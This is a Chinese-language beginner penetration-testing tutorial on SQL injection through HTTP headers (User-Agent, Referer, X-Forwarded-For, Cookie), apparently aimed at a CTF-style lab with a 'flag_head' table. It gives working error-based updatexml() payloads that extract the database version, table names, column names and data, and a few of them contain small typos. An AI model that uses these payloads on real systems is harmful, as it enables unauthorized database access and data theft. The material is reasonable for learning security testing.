渗透测试基础-Head注入

admin 2022年5月17日04:25:38评论40 views字数 1203阅读4分0秒阅读模式


HTTP协议简析之Head部分


数据包的第一行的第一个(请求方式):


GET /          

POST


我们输入的地方:

1.网址的参数的值。(GET请求)

2.网站给我们提供的框框部分。  (POST请求)




渗透测试基础-Head注入




数据包的第一行下面,都叫做【请求头】,也可以叫做【head】。


请求头的意思:告诉目标服务器我们用户的一些信息。

Referer: 我们从哪个网站来的。

User-Agent:告诉服务器,我们的浏览器的一些相关信息

accept:告诉服务器,我们接受文件的类型。


head注入


head注入:注入点在head处,就叫做head注入。

关键点:head注入,一般是需要配合成功登录的。

前提:目标网址会记录你的一些head信息,放进数据库,那么只要放进数据库,就说明与数据库产生了交互。

--> 可能就存在数据库注入漏洞。


报错注入:有的时候,数据库一旦执行语句的时候发生错误,那么数据库会把这个错误信息显示出来。

利用:数据库会显示报错信息,同时他会将你输入的数据库语句执行,伴随着报错显示出来。


这个是固定的:


' or updatexml(1,concat(0x7e,(select version())),1),1) -- qwe


updataxml() # 这是一个函数,作用:能够将数据库语句执行,并且伴随着数据库报错显示错来。


总结性框架


head注入:

user-agent注入:在user-agent处

referer注入:在referer处

XFF注入:在X-Forwarded-for处。

cookie注入:在Cookie的地方输入数据库语句


分类原则:是看注入点的。


基础操作


查询数据库版本


'or updatexml(1,concat(0x7e,(select version())),1),1) -- qwe'or updatexml(1,concat(0x7e,(select database())),1),1)-- adf



查询表名

'or updatexml(1,concat(0x7e,(select table_name from information_schema.tableswhere table_schema=database() limit 0,1)),1),1) -- qwe

查询字段名


'or updatexml(1,concat(0x7e,(select column_name from information_schema.columnswhere table_schema=database() and table_name='flag_head' limit 1,1)),1),1--qwe



查询数据


'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1) --qwe




     ♀♀♀ 记录、交流、分享♀♀♀





原文始发于微信公众号(小白安全的笔记):渗透测试基础-Head注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日04:25:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试基础-Head注入http://cn-sec.com/archives/1012046.html

发表评论

匿名网友 填写信息